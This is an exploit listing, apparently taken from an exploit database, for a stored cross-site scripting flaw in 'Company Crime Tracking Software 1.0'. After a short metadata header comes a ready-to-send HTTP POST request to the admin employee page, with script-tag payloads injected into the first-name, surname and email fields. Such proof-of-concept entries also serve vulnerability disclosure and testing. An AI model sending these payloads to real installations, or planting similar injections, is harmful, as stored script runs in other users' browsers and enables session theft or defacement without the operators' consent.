Exploit for Company Crime Tracking Software 1.0 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:162050
# Exploit Title: Company Crime Tracknig Software | 'fname,surname,email' Stored Cross Site Scripting   
# Exploit Author: Richard Jones  
# Date: 01-04-2021  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/12644/company-crime-tracking-system.html  
# Version: 1.0  
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34  
  
  
POST /caaz/admin/a_employees.php HTTP/1.1  
Host: TARGET  
Content-Type: multipart/form-data; boundary=---------------------------297905141828527091333499064608  
Content-Length: 1010   
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=347sjf013j8s1blsuvsa32hr7r  
  
  
----------------- snip----------------  
-----------------------------297905141828527091333499064608  
Content-Disposition: form-data; name="fname"  
  
<script>prompt(1)</script>  
-----------------------------297905141828527091333499064608  
Content-Disposition: form-data; name="surname"  
  
<script>prompt(2)</script>  
-----------------------------297905141828527091333499064608  
Content-Disposition: form-data; name="email"  
  
a@Aa.com<script>prompt(4)</script>  
----------------- snip----------------